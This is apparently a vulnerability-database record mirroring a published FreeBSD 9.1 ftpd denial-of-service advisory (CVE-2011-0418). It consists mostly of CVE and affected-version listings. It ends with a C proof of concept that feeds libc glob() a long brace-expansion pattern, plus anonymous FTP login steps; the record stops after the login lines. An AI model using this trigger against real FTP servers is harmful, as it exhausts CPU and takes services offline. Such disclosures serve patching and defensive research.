Details of VAR-E-201302-0650

ID

VAR-E-201302-0650

CVE

cve_id:	CVE-2011-0418	Trust: 3.4
cve_id:	CVE-2010-4051	Trust: 1.5
cve_id:	CVE-2010-4052	Trust: 1.5
cve_id:	CVE-2010-2632	Trust: 1.3
cve_id:	CVE-2011-3336	Trust: 1.0

sources: BID: 43819 // BID: 47671 // PACKETSTORM: 106589 // PACKETSTORM: 94556 // PACKETSTORM: 120032 // PACKETSTORM: 125725 // PACKETSTORM: 97315 // PACKETSTORM: 101052 // EXPLOIT-DB: 24450 // EDBNET: 46570

EDB ID

24450

TITLE

FreeBSD 9.1 - 'ftpd' Remote Denial of Service - FreeBSD dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 24450

DESCRIPTION

FreeBSD 9.1 - 'ftpd' Remote Denial of Service. CVE-2011-0418CVE-90005 . dos exploit for FreeBSD platform

Trust: 0.6

sources: EXPLOIT-DB: 24450

AFFECTED PRODUCTS

vendor:	multiple	model:	vendors libc/glob	scope:	-	version:	-	Trust: 1.0
vendor:	freebsd	model:	-	scope:	eq	version:	9.1	Trust: 1.0
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.7	Trust: 0.9
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.0.2	Trust: 0.6
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.0	Trust: 0.6
vendor:	freebsd	model:	8.2-stable	scope:	-	version:	-	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.5	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5	Trust: 0.6
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.6	Trust: 0.6
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.5	Trust: 0.6
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.4	Trust: 0.6
vendor:	bsd	model:	libc/regcomp	scope:	-	version:	-	Trust: 0.5
vendor:	freebsd	model:	ftpd remote	scope:	eq	version:	9.1	Trust: 0.5
vendor:	os	model:	safari firefox regex	scope:	eq	version:	x//	Trust: 0.5
vendor:	gnu	model:	libc/regcomp	scope:	-	version:	-	Trust: 0.5
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20091122	Trust: 0.3
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20081009	Trust: 0.3
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20080929	Trust: 0.3
vendor:	tnftpd	model:	tnftpd	scope:	eq	version:	20080609	Trust: 0.3
vendor:	sun	model:	solaris 9 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 9 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 8 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 8 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris express	scope:	eq	version:	11	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	sun	model:	solaris 10 x86	scope:	-	version:	-	Trust: 0.3
vendor:	sun	model:	solaris 10 sparc	scope:	-	version:	-	Trust: 0.3
vendor:	openbsd	model:	-current	scope:	-	version:	-	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	4.0.1	Trust: 0.3
vendor:	netbsd	model:	current	scope:	-	version:	-	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	4.0	Trust: 0.3
vendor:	juniper	model:	networks junos	scope:	eq	version:	10.4	Trust: 0.3
vendor:	gnu	model:	glibc2	scope:	eq	version:	2.3.10	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.11.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.11.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.10.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.5	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.10	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.4	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.2	Trust: 0.3
vendor:	gnu	model:	glibc and greater	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.3-10	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.1-6	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.6	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.5	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.4	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.3	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.2	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0.1	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.0	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	2.7	Trust: 0.3
vendor:	gnu	model:	cfengine	scope:	eq	version:	1.2.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.0.x	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	5.5	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.5	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.3	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.2	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.2	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	-release/alpha	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	-release-p5	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.0.x	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	-release-p14	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	alpha	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.0	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-release-p3	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-release-p20	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	-release-p8	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.10	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.9	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	4.9	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.9	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	-release-p7	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.8	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	-release-p17	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.6.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-release-p20	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.6	Trust: 0.3
vendor:	freebsd	model:	-stablepre2002-03-07	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-release-p32	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.5	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	-release-p42	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.4	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-release-p38	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.3	Trust: 0.3
vendor:	freebsd	model:	-stablepre122300	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-stablepre050201	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	4.1.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	4.1.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.1.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.0.x	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	4.0	Trust: 0.3
vendor:	freebsd	model:	alpha	scope:	eq	version:	4.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.0	Trust: 0.3
vendor:	freebsd	model:	-stablepre2001-07-20	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.5x	Trust: 0.3
vendor:	freebsd	model:	-stablepre122300	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	-stablepre050201	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.4x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.3x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.2x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.1x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.1	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	3.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	3.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.7.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.7	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.6.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.6	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1x	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.0.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.1.5.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.1.5	Trust: 0.3
vendor:	freebsd	model:	9.0-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	9.0-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	9.0-rc3	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	9.0-rc1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.2-release-p2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.2-release-p1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	release -p3	scope:	eq	version:	8.2-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	8.2	Trust: 0.3
vendor:	freebsd	model:	8.1-release-p5	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.1-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.1-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.1-prerelease	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	8.1	Trust: 0.3
vendor:	freebsd	model:	8.0-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	8.0-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.4-release-p2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-release-p3	scope:	eq	version:	7.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.4	Trust: 0.3
vendor:	freebsd	model:	7.3-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.3-release-p6	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.3-release-p1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	release p7	scope:	eq	version:	7.3--	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.3	Trust: 0.3
vendor:	freebsd	model:	7.2-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-release-p1	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-rc2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.2-prerelease	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.2	Trust: 0.3
vendor:	freebsd	model:	7.1-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.1-release-p6	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.1-release-p5	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.1-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-release-p2	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	-release-p1	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	-pre-release	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.1	Trust: 0.3
vendor:	freebsd	model:	7.0-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p8	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p3	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p12	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release-p11	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.0-release	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	beta4	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	-release-p9	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	-prerelease	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	7.0	Trust: 0.3
vendor:	freebsd	model:	6.4-releng	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.4-release-p5	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.4-release-p4	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.4-release-p2	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	-release-p3	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.4	Trust: 0.3
vendor:	freebsd	model:	6.3-release-p11	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	6.3-release-p10	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-release-p9	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-release-p8	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-release-p6	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.3	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.2	Trust: 0.3
vendor:	freebsd	model:	-releng	scope:	eq	version:	6.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.2	Trust: 0.3
vendor:	freebsd	model:	-stable	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	-release-p10	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	-release	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.1	Trust: 0.3
vendor:	freebsd	model:	6.0-releng	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	-release-p5	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	6.0	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.5	Trust: 0.3
vendor:	freebsd	model:	5.4-stable	scope:	-	version:	-	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.4	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	4.11	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	2.0.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.5	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.2	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.1	Trust: 0.3
vendor:	freebsd	model:	freebsd	scope:	eq	version:	1.0	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	16.2	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	16.1	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	16.0	Trust: 0.3
vendor:	avaya	model:	cms server	scope:	eq	version:	15.0	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.6	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.4	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.3	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.2	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.8	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.7	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.6	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.5	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.4	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.3	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.2	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.5.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.7	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.8	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.6	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.4	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.3	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.5.1	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6	Trust: 0.3
vendor:	freebsd	model:	8.3-stable	scope:	ne	version:	-	Trust: 0.3
vendor:	freebsd	model:	7.4-stable	scope:	ne	version:	-	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	ne	version:	x10.6.8	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	eq	version:	1.0.31	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	eq	version:	1.0.30	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	eq	version:	1.0.29	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.8	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.3	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.2	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.1	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.0	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.1	Trust: 0.3
vendor:	netbsd	model:	rc3	scope:	eq	version:	5.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2010.1	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2010.1	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandrakesoft	model:	enterprise server x86 64	scope:	eq	version:	5	Trust: 0.3
vendor:	mandrakesoft	model:	enterprise server	scope:	eq	version:	5	Trust: 0.3
vendor:	mandrakesoft	model:	corporate server x86 64	scope:	eq	version:	4.0	Trust: 0.3
vendor:	mandrakesoft	model:	corporate server	scope:	eq	version:	4.0	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	ne	version:	1.0.32	Trust: 0.3

EXPLOIT

FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old
bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU
resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
sending 'STAT' command with special wildchar, enought to create ftpd
process with 100% CPU usage.

Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(){
glob_t globbuf;
char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
